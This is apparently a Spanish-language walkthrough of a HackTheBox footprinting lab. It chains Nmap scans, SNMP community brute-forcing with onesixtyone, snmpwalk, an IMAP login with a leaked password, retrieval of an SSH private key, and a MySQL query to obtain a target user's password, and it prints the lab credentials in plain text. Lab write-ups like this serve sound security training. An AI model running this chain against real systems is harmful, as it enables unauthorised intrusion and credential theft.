🔴 Laboratorio de Huella - Dificl

##seguridad-ofensiva ##laboratorio ##dificil ##Nmap #snmp ##SSH ##mysql ##onesixtyone ##smpwalk

🧠 Contexto del Laboratorio 3

📡 El tercer servidor actúa como servidor MX (correo) y de gestión interna de la red.
💾 También cumple función como servidor de respaldo para las cuentas del dominio.

👤 Se ha creado un usuario interno llamado HTB, y nuestro objetivo es obtener sus credenciales como prueba de acceso.

NMAP

sudo nmap -p- --open -sS -vvv --min-rate 5000 -n -Pn 10.129.202.20 -oG networked

sudo nmap -sC -sV -p22,110,143,993,995 -n -Pn -oN script_scan.txt 10.129.202.20

{D4750EE2-C747-40DF-A0AC-851CF89CDA26}.png

🔍 Resumen del escaneo Nmap

Puertos abiertos descubiertos:

Certificado SSL válido

SNMP

 sudo nmap -sU 10.129.202.20  -p 161 --script=snmp-brute -Pn

El puerto de snmp esta abierto
🧪 Se utilizó onesixtyone para detectar comunidades válidas:

onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.202.20

✅ Se encontró la comunidad backup, lo que nos permitió extraer datos sensibles del sistema:
🔍 Enumeración con snmpwalk

snmpwalk -c backup -v1 10.129.202.20

📌 Información obtenida:

🔐 SSL

openssl s_client -connect 10.129.202.20:993

tag0 login tom NMds732Js2761
tag1 list "" *
tag2 select "INBOX"

📎 Se encontró una clave SSH privada
{2580BBAB-CFAF-4419-A801-1A9C7986E83E}.png

🔑 Acceso SSH

💾 Guardamos la clave como id_rsa
🛡️ Asignamos permisos adecuados:

chmod 600 id_rsa

🔗 Conexión SSH:

ssh -i id_rsa tom@10.129.202.20

✅ ¡Ya estamos dentro del sistema!
{CD1CB9E2-948A-4D99-B500-D3C76C998776}.png

🗃️ Acceso a la base de datos

📂 Nos conectamos a MySQL

mysql --user=tom -p

📄 Consultas:

SHOW DATABASES;
use users;
SELECT * FROM users WHERE username = 'HTB';

🔐 Obtenemos la contraseña del usuario HTB.